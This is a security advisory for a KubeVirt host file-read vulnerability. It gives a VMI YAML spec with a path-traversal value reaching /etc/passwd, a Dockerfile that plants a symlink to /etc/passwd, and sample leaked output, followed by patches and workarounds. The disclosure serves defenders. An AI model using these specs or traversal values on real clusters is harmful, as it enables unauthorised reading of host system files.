### Impact
Users with the permission to create VMIs can construct VMI specs which allow them to read arbitrary files on the host. There are three main attack vectors:
1. Some path fields on the VMI spec were not properly validated and allowed passing in relative paths which would have been mounted into the virt-launcher pod. The fields are: `spec.domain.firmware.kernelBoot.container.kernelPath`, `spec.domain.firmware.kernelBoot.container.initrdPath` as well as `spec.volumes[*].containerDisk.path`.
Example:
“`yaml
apiVersion: [kubevirt.io/v1](https://kubevirt.io/v1)
kind: VirtualMachineInstance
metadata:
name: vmi-fedora
spec:
domain:
devices:
disks:
– disk:
bus: virtio
name: containerdisk
– disk:
bus: virtio
name: cloudinitdisk
– disk:
bus: virtio
name: containerdisk1
rng: {}
resources:
requests:
memory: 1024M
terminationGracePeriodSeconds: 0
volumes:
– containerDisk:
image: [quay.io/kubevirt/cirros-container-disk-demo:v0.52.0](https://quay.io/kubevirt/cirros-container-disk-demo:v0.52.0)
name: containerdisk
– containerDisk:
image: [quay.io/kubevirt/cirros-container-disk-demo:v0.52.0](https://quay.io/kubevirt/cirros-container-disk-demo:v0.52.0)
path: test3/../../../../../../../../etc/passwd
name: containerdisk1
– cloudInitNoCloud:
userData: |
#!/bin/sh
echo ‘just something to make cirros happy’
name: cloudinitdisk
“`
2. Instead of passing in relative links on the API, using malicious links in the containerDisk itself can have the same effect:
“`Dockerfile
FROM
RUN mkdir -p /etc/ && touch /etc/passwd
RUN mkdir -p /disks/ && ln -s /etc/passwd /disks/disk.img
“`
3. KubeVirt allows PVC hotplugging. The hotplugged PVC is under user-control and it is possible to place absolute links there. Since containerDisk and hotplug code use the same mechanism to provide the disk to the virt-launcher pod, it can be used too to do arbitrary host file reads.
In all three cases it is then possible to at lest read any host file:
“`
$ sudo cat /dev/vdc
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
[…]
“`
### Patches
KubeVirt 0.55.1 provides patches to fix the vulnerability.
### Workarounds
* Ensure that the `HotplugVolumes` feature-gate is disabled
* ContainerDisk support can’t be disabled. The only known way to mitigate this issue is create with e.g. policy controller a conditiontemplate which ensures that no containerDisk gets added and that `spec.domain.firmware.kernelBoot` is not used on VirtualMachineInstances.|
* Ensure that SELinux is enabled. It blocks most attempts to read host files but does not provide a 100% guarantee (like vm-to-vm read may still work).
### References
Disclosure notice form the discovering party: https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm
### For more information
For interested vendors which have to provide a fix for their supported versions, the following PRs are providing the fix:
* https://github.com/kubevirt/kubevirt/pull/8198
* https://github.com/kubevirt/kubevirt/pull/8268
### Credits
Oliver Brooks and James Klopchic of NCC Group
Diane Dubois and Roman Mohr of GoogleRead More